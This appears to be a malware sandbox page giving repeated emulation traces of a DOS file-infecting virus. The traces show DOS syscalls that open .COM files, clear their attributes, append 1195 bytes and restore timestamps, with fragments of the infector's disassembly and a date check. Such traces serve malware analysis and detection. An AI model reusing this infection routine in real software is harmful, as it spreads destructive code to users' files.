Sample viewer

vx.netlux.org/Virus.DOS.Riot.Psychosis.1195

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:18:17.215239886Z 71 PC: 12b2d | Get current directory
2018-12-17T22:18:17.219036741Z 59 PC: 12b38 | Change current directory
2018-12-17T22:18:17.223526351Z 26 PC: 12beb | Set disk transfer address
2018-12-17T22:18:17.224900916Z 78 PC: 12bf9 | Find first file
2018-12-17T22:18:17.241619207Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:18:17.251711407Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.255680679Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-17T22:18:17.257814921Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.272182573Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.274586574Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:18:17.281897668Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.286398499Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.290079523Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.292890919Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.295414365Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.305038347Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.306714089Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.335119199Z 67 PC: 12d32 | Get or set file attributes
2018-12-17T22:18:17.345423525Z 79 PC: 12c0c | Find next file
2018-12-17T22:18:17.350995613Z 61 PC: 12c24 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:18:17.35570187Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.35992793Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-17T22:18:17.361420362Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.368711322Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.371270562Z 61 PC: 12cc1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:18:17.378222757Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.383393169Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.386929899Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.389407634Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.391704133Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.401759524Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.403429686Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.412082018Z 67 PC: 12d32 | Get or set file attributes
2018-12-17T22:18:17.422503475Z 79 PC: 12c0c | Find next file
2018-12-17T22:18:17.425026475Z 61 PC: 12c24 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:18:17.431558891Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.438485322Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-17T22:18:17.440797221Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.451138136Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.45353635Z 61 PC: 12cc1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:18:17.460243398Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.463212232Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.466704464Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.46950768Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.47158669Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.481394785Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.482894166Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.490387217Z 67 PC: 12d32 | Get or set file attributes
2018-12-17T22:18:17.500407898Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-17T22:18:17.502679447Z 59 PC: 12dad | Change current directory
2018-12-17T22:18:17.506484396Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:36.982869541Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:36.986715256Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:36.991860931Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:36.99310665Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:36.999893655Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.010620347Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:37.017886756Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:37.020484035Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:37.040998671Z 62 PC: 12cbc | Close file
2018-12-25T11:48:37.04370138Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.057238231Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:37.067015703Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.069967053Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.072870545Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:37.075869793Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:37.086498346Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:37.088687161Z 62 PC: 12d21 | Close file
2018-12-25T11:48:37.099047968Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:37.111414924Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:37.114794713Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:37.123218288Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:37.131305879Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.134105918Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:37.145625406Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:37.148415257Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:37.155805423Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:37.158910172Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:37.166803517Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:37.169871606Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:37.172082783Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:37.183107558Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:37.18543569Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:37.194964404Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:37.206937693Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:37.210601097Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:37.218442Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:37.226956027Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.229803757Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:37.240987779Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:37.243217926Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:37.252290047Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:37.256641407Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:37.260012554Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:37.26453287Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:37.267093551Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:37.277828553Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:37.280891909Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:37.290371691Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:37.3017682Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:37.305445978Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:37.310551059Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:37.848802114Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:37.852183427Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:37.855975864Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:37.856870614Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:37.863166496Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.867182678Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:37.871026224Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:37.872662334Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:37.886397177Z 62 PC: 12cbc | Close file
2018-12-25T11:48:37.888450585Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.900273593Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:37.907078642Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.9087236Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.910345358Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:37.912050208Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:37.91761613Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:37.918579668Z 62 PC: 12d21 | Close file
2018-12-25T11:48:37.937764322Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:37.948045505Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:37.95074953Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:37.959054581Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:37.965670196Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.967706622Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:37.980117696Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:37.981772112Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:37.988201579Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:37.991761248Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:37.994184628Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:37.996676605Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:37.999386713Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.015054098Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.016984469Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.034509671Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.045282456Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:38.048246707Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:38.055523145Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:38.062874475Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:38.065242814Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:38.075052881Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:38.077169062Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:38.083842875Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:38.086560079Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:38.102389781Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:38.105500785Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:38.107689908Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.11808532Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.119540915Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.12769457Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.138855116Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:38.140955846Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:38.14960227Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:38.113457019Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:38.119507926Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:38.127969762Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:38.129064683Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:38.135937378Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:38.143035129Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:38.149372327Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:38.151604423Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:38.176225106Z 62 PC: 12cbc | Close file
2018-12-25T11:48:38.177964595Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:38.18472848Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:38.193236751Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:38.195859607Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:38.19860254Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:38.20144942Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:38.213437508Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:38.215111616Z 62 PC: 12d21 | Close file
2018-12-25T11:48:38.228337474Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:38.238861684Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:38.241614115Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:38.249137984Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:38.255695592Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:38.258062398Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:38.26836915Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:38.270613901Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:38.277314268Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:38.280447622Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:38.295125563Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:38.297721739Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:38.299985371Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.309624019Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.311309122Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.319541068Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.329478793Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:38.332070387Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:38.338634492Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:38.346018857Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:38.348178174Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:38.358213085Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:38.361428594Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:38.367952198Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:38.37055692Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:38.373831234Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:38.376592921Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:38.37869411Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.389023972Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.390444033Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.397890343Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.407545287Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:38.409831528Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:38.413697401Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.033814869Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.036874296Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.040728002Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.041629204Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.047694119Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.053933775Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.060011491Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.062187652Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.080347737Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.081975414Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.08909522Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.095693794Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.098310364Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.1010943Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.104122488Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.114588984Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.115688742Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.121093795Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.127271085Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.129794224Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.136579783Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.142762215Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.144741305Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.155663632Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.157700723Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.164570585Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.169099052Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.172569872Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.175121724Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.17720601Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.185967688Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.187448348Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.195070224Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.204569946Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.20717809Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.213897764Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.229119985Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.231123778Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.240944968Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.242949796Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.249856414Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.252596167Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.256157802Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.25897846Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.261088984Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.27077607Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.272129116Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.279827923Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.291620431Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.293782128Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.297676347Z 59 PC: 12db4 | Change current directory

